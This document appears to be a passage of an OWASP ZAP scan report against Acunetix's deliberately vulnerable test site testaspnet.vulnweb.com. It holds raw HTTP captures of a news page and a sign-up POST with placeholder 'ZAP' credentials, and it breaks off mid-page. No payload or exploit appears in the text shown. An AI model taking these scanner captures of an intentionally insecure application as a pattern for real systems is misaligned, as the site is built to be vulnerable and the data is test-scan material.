ZZOlJz58
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18076
Response Body - size: 18,076 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMJd1ucUfNI8x3o4I+C+TrBHqvCj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	POST
Parameter
Attack
Evidence	<form name="Form1" method="post" action="Signup.aspx" id="Form1">
Show / hide Request and Response
Request Header - size: 407 bytes.	POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Signup.aspx Content-Length: 1060 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,060 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc%2BmKdRBm3AUE&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13329
Response Body - size: 13,329 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBBsKql/xMtNSXxlEXNG8K/C7XIc2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> <span id="lblStatus">Subscription successfull. Please visit the login page to login.</span> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a 